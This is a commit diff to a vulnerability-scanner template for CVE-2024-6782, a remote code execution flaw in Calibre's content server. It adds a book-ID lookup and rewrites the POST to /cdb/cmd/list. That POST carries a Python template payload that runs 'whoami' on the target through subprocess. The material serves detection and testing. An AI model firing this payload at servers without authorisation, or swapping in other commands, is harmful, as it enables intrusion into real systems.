fix-template

2024-08-01 12:41:00 +05:30 · 2024-08-01 12:41:00 +05:30 · 4f504ac7e8
parent a35a88e447
commit 4f504ac7e8
1 changed files with 28 additions and 2 deletions
--- a/http/cves/2024/CVE-2024-6782.yaml
+++ b/http/cves/2024/CVE-2024-6782.yaml
@ -16,19 +16,45 @@ info:
  tags: cve,cve2024,calibre,rce

 http:
+  - raw:
+      - |
+        GET /interface-data/books-init HTTP/1.1
+        Host: {{Hostname}}
+        Referer: {{RootURL}}
+
+    extractors:
+      - type: json
+        name: book_ids
+        internal: true
+        json:
+          - '.search_result.book_ids[0]'
+
  - raw:
      - |
        POST /cdb/cmd/list HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

-        [["template"], "", "", "", 1, "python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami']).decode()"]
+        [
+            ["template"],
+            "", 
+            "",
+            "",
+            {{book_ids}},
+           "python:def evaluate(a, b):\n  import subprocess\n  try:\n    return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n  except Exception:\n    return subprocess.check_output(['sh', '-c', 'whoami'])\n"
+        ]

    matchers-condition: and
    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "b'([^']+)"
+
      - type: word
+        part: content_type
        words:
-          - "" #to be added
+          - "application/json"

      - type: status
        status: